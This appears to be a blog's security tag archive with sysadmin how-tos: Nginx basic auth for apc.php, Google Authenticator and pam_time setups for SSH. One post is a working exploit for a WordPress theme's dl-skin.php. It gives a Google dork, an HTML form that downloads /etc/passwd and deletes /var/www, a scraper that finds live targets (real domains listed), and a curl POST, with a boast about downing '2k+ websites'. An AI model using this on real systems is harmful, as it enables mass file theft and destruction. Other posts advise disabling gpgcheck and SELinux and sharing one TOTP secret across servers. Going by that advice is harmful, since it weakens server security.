Tag Archive: Security


HTTP Authentication for APC

Their are times where you need apc.php to clear browser cache, either you can write a code to clear the cache or to view cache contents via browser.

you can just protect it via HTTP AUTH to avoid being viewed by third-party

Here we are using Nginx as Front-end and PHP_fpm as back-end,

Considering apc has already been installed,

locate apc.php file on server and copy it to desired location,

Consider a Scenario, abc.com.au has apc.php inside public_html/cache/apc.php

Below is the Nginx code to protect apc.php file, below should be under v-hosts file of a domain abc.com.au,

location ^~ /cache {
auth_basic “Admin”;
auth_basic_user_file /var/www/html/htpasswd;

location ~ \.php$ {
fastcgi_pass 127.0.0.1:9002;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include /etc/nginx/fastcgi_params;
}
}

  • htpasswd -b -c /var/www/html/htpasswd test1 g009fdr

where, test1 : username and g009fdr: password

  • rename apc.php to index.php
  • vi index.php and make changes as shown below,

apc

  • service nginx restart

I don’t know why developers around the globe are so much into copy and pasting it before actually checking out things manually?

This is just a standard example where Security Admins/System Admins will be screwed big time.

Tip for Security Admins:

  • Have proper checks and URL Sanitization, any requests to OS files or file that can bring your server down, block that IP.
  • Analyze logs, have automated script to parse logs for malicious request, IP’s.
  • keep yourself updated with latest hacks and vulnerabilities
  • have IDS for any new application installed and check for any vulnerabilities associated with it.

Enough of consultancy!!!

How to exploit?

1. Google Dork,

index:wp-content/themes/persuasion/lib/scripts/dl-skin.php

OR

inurl:wp-content/themes/persuasion/lib/scripts/

1

2. A test domain hosted on a server, mine was testing.com (NOT LIVE), behind TOR 😉

Add below exploit under public_html, say test.html

<html>
<body>
<form action=”http://vulnerable-site.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php&#8221; method=”post”>
Existing file’s name:<input type=”text” name=”_mysite_download_skin” value=”/etc/passwd”><br>
Directory to be removed:<input type=”text” name=”_mysite_delete_skin_zip” value=”/var/www”><font color=red>Use with caution it will delete the files and directories if it is writeable</font><br>
<input type=”submit”  name=press value=”OK”>
</form>
</body>
</html>

 

2

3. you’ll find /etc/passwd downloaded, check /home/ and just delete it by specifying the path in above test box.

3 4

4. Imagine it’s coded and automated,

you can have something like, create a function say, google and search as shown below,

Command:

function google { Q=”$@”; GOOG_URL=’https://www.google.de/search?tbs=li:1&q=&#8217;; AGENT=”Mozilla/4.0″; stream=$(curl -A “$AGENT” -skLm 10 “${GOOG_URL}${Q//\ /+}” | grep -oP ‘\/url\?q=.+?&amp’ | sed ‘s|/url?q=||; s|&amp||’); echo -e “${stream//\%/\x}”; }

Sample Output:

[root@BT]# google inurl:wp-content/themes/persuasion/lib/scripts/ | sed ‘s/scripts.*$/scripts/’ | uniq
http://burlingtonventures.com/wp-content/themes/persuasion/lib/scripts
http://finseafood.com/wp-content/themes/persuasion/lib/scripts
http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts
http://laforceteamwork.com/wp-content/themes/persuasion/lib/scripts
http://www.kismetdallas.com/wp-content/themes/persuasion/lib/scripts
[root@BT]#

Then you can have curl to check the HTTP status code of above searches,

URL=`google inurl:wp-content/themes/persuasion/lib/scripts/ | sed ‘s/scripts.*$/scripts/’`

for STATUS in $URL
do
HTTP_STATUS_CODE=`curl -s -o /dev/null -I -w “%{http_code}” http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php`

if [ “$HTTP_STATUS_CODE” == 200 ];

then

curl command to post data

else

echo “message”

fi

done

curl command used with  formfind can be used to web forms or below command,

[root@BT]# curl –data “_mysite_download_skin=%2Fetc%2Fpasswd&_mysite_delete_skin_zip=%2Fvar%2Fwww&press=%20OK%20” –dump-header headers http://www.testing.com/test.html

If unaware about Curl, you can use FireCurl to get the response of curl command

In no time, you’ll end up bringing down 2k+ websites.

Vulnerable Script: 

Cheers!!!!

Cent OS 6.x with Python 2.6 and higher

Install Mercurial and Pamdevel

Install Google Authenticator

Make changes in following config files for google authenticator to work

  • vi /etc/pam.d/sshd

auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf

auth   required  pam_google_authenticator.so

auth    required  password_auth

  • vi /etc/security/access-local.conf

+ : ALL : 96.x.x.x 122.x.x.x

+ : ALL : LOCAL

– : ALL : ALL

save the file

  • vi /etc/ssh/sshd_config

UsePAM Yes
ChallengeResponseAuthentication yes

Now you are already done with installation, run Google-authenticator command as shown below

google-authenticator

https://www.google.com/chart?chs=200×200&chld=M|0&cht=qr&chl=otpauth://totp/user@server%3Fsecret%3DSAEP64T5VZAVWAFB
Your new secret key is: SAEP64T5VZAVWAFB
Your verification code is 376046
Your emergency scratch codes are:
67868696
26247332
54815527
54336661
71083816

Do you want me to update your “~/.google_authenticator” file (y/n) y

Do you want to disallow multiple uses of the same authentication
token? This restricts you to one login about every 30s, but it increases
your chances to notice or even prevent man-in-the-middle attacks (y/n) y

By default, tokens are good for 30 seconds and in order to compensate for
possible time-skew between the client and the server, we allow an extra
token before and after the current time. If you experience problems with poor
time synchronization, you can increase the window from its default
size of 1:30min to about 4min. Do you want to do so (y/n) n

If the computer that you are logging into isn’t hardened against brute-force
login attempts, you can enable rate-limiting for the authentication module.
By default, this limits attackers to no more than 3 login attempts every 30s.
Do you want to enable rate-limiting (y/n) y

• vi /root/.google_authenticator and copy the below contents overwriting the ones already present in the file

AW27V7FTT3WHWIUZ
” TIME_SKEW 10
” RESETTING_TIME_SKEW
” RATE_LIMIT 3 30 1343016196 1343016212
” DISALLOW_REUSE 44718971
” TOTP_AUTH
60096634
41809819
10524489
24780266
74238483

  • Service sshd restart

PS: Above series of questions to be answered according your needs and requirements.

Cent OS 5.x and Python version lower than 2.6

  • yum install git*
  • If dependency fails then –> yum install git –disableexcludes=main
  • If still error for repository then create a repo file epel.repo under /etc/yum.repo.d/ and add below repository

[epel]
name=Extra Packages for Enterprise Linux 5 – $basearch
#baseurl=http://download.fedoraproject.org/pub/epel/5/$basearch
mirrorlist=http://mirrors.fedoraproject.org/mirrorlist?repo=epel-5&arch=$basearch
failovermethod=priority
enabled=1
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL

[epel-debuginfo]
name=Extra Packages for Enterprise Linux 5 – $basearch – Debug
#baseurl=http://download.fedoraproject.org/pub/epel/5/$basearch/debug
mirrorlist=http://mirrors.fedoraproject.org/mirrorlist?repo=epel-debug-5&arch=$basearch
failovermethod=priority
enabled=0
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL
gpgcheck=1

[epel-source]
name=Extra Packages for Enterprise Linux 5 – $basearch – Source
#baseurl=http://download.fedoraproject.org/pub/epel/5/SRPMS
mirrorlist=http://mirrors.fedoraproject.org/mirrorlist?repo=epel-source-5&arch=$basearch
failovermethod=priority
enabled=0
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL
gpgcheck=1

you’ll get an error saying “File does not exist file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL”

just change gpgcheck from ‘1’ to ‘0’

try yum install git* now. 😉

UsePAM Yes
ChallengeResponseAuthentication yes

  • vi /etc/pam.d/sshd (NOTE : if you don’t see password-auth inside /etc/pam.d/sshd then)

auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf

auth   required  pam_google_authenticator.so

auth   include    system-auth

  • and you are good to go 🙂 🙂

Check your Implementation

  • Login to your Linux box from IP specified under access-local.conf file, should not ask for verification code.
  • Login from server outside and will ask for verification code.
  • If doesn’t works then make sure selinux is disabled.
  • also time sync should be in-sync.

**Note –> Above implementation will not ask for verification code for IP’s in /etc/security/access-local.conf for other IP’s it will ask for verification code.

Also the secret key generated for a server resides under cat /root/.google_authenticator. If you have bunch of servers then just copy the .google_authenticator file across all servers and set the key on smartphones (I-phone, Blackberry, I-pad etc etc) and the googleauthenticator application will generate verification code every 30seconds.

copying key across all servers will advantage in a way to handle single secret key across all servers and then every 3 months you can update the key and copy updated key on all servers.

Let us know if any script required for any automation.

http://support.google.com/accounts/bin/answer.py?hl=en&answer=1066447

Sometimes we need to allow user to access SSH in a specific time interval.

For Example : Allow Mike to access SSH service between 1:00 AM to 5:00 AM.

We can achieve this using pam_time module.The pam_time module is an account module type. No arguments are passed directly to the module, but instead all configuration takes place within /etc/security/time.conf.

The time.conf operates based on rules, and each rule uses the following syntax:

services;ttys;users;times

Steps to be followed,

  • SSH to the server and vi /etc/pam.d/sshd

cat /etc/pam.d/sshd
#%PAM-1.0
auth include system-auth
account required pam_time.so
account required pam_nologin.so
account include system-auth
password include system-auth
session optional pam_keyinit.so force revoke
session include system-auth

auth required pam_shells.so

The one in BOLD must be added.

  • vi /etc/pam.d/system-auth

add “account     required      pam_time.so” 

  • vi /etc/security/time.conf

sshd;*;mike;Wk0100-0500

  • Restart sshd service

**Available abbreviates for the days of the week

Mo : Monday
Tu : Tuesday
We : Wednesday
Th : Thursday
Fr : Friday
Sa : Saturday
Su : Sunday
Wd : Sa/Su
wk : Mo/Tu/We/Th/Fr
Al : All Days